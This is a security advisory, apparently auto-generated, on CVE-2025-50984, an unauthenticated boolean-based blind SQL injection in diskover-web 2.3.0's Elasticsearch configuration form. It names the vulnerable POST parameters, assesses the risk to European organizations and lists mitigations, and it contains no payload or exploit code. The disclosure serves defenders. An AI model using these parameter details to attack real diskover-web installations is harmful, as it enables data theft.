CVE-2025-50984 identifies multiple boolean-based blind SQL injection vulnerabilities in diskover-web version 2.3.0 Community Edition, specifically within its Elasticsearch configuration form. The vulnerability arises due to improper input validation and lack of parameterization in the handling of POST parameters such as ES_PASS, ES_MAXSIZE, ES_TRANSLOGSIZE, ES_TIMEOUT, ES_USER, ES_HOST, ES_PORT, ES_SCROLLSIZE, ES_CHUNKSIZE, among others. These parameters accept user input that is incorporated into JSON-based queries without adequate sanitization, allowing attackers to inject arbitrary SQLite expressions. The injection is boolean-based and blind, meaning attackers can infer the presence or absence of data by observing application behavior or response times, even without direct error messages or output. Critically, exploitation does not require authentication, enabling remote attackers to extract sensitive information from the underlying database. The vulnerability stems from the application's construction of Elasticsearch queries that internally use SQLite expressions wrapped in JSON functions, which are manipulated by crafted inputs. Although no known exploits are currently reported in the wild, the flaw presents a significant risk due to the ease of exploitation and the potential for data leakage. The lack of a CVSS score indicates this is a newly published vulnerability with limited public analysis, but the technical details suggest a serious security issue that requires immediate attention.

For European organizations using diskover-web v2.3.0 Community Edition, this vulnerability poses a substantial risk to confidentiality and integrity of sensitive data stored or indexed via Elasticsearch. Since the flaw allows unauthenticated attackers to perform blind SQL injection, attackers could systematically extract sensitive configuration details, credentials, or other protected information from the backend database. This could lead to further compromise of internal systems, unauthorized data disclosure, or lateral movement within networks. Organizations in sectors with strict data protection regulations such as GDPR (e.g., finance, healthcare, government) face heightened compliance risks and potential legal consequences if data breaches occur. Additionally, the ability to manipulate Elasticsearch configurations could disrupt availability or degrade system performance, impacting operational continuity. The vulnerability's exploitation could also undermine trust in data management and search infrastructure, critical for data-driven decision-making in European enterprises.

To mitigate this vulnerability, organizations should immediately upgrade diskover-web to a patched version once available from the vendor or community maintainers. In the absence of an official patch, organizations should implement strict input validation and sanitization on all Elasticsearch configuration form parameters, particularly those accepting user input in POST requests. Employing parameterized queries or prepared statements when constructing JSON-based Elasticsearch queries is essential to prevent injection. Network-level controls such as restricting access to the diskover-web interface to trusted internal IPs or VPNs can reduce exposure. Additionally, monitoring and logging of unusual query patterns or repeated failed attempts targeting the vulnerable parameters can aid in early detection of exploitation attempts. Organizations should also review and harden Elasticsearch and underlying database permissions to minimize the impact of any potential compromise. Finally, conducting a thorough security audit of all applications interfacing with Elasticsearch to identify similar injection risks is recommended.